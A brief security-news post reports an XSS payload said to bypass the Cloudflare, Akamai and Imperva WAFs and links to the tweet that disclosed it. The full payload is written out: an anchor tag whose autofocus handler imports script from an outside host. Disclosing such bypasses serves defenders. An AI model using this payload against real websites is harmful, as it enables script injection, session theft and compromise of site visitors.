A new XSS bypass has been discovered that affects Cloudflare, Akamai, and Imperva WAF. The bypass payload is <A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>. This bypass allows an attacker to execute malicious XSS scripts even when protected by these WAF solutions. Stay informed and update your security measures accordingly.
For more insights, check out the original tweet here: https://twitter.com/theSouilos/status/1850969724190146600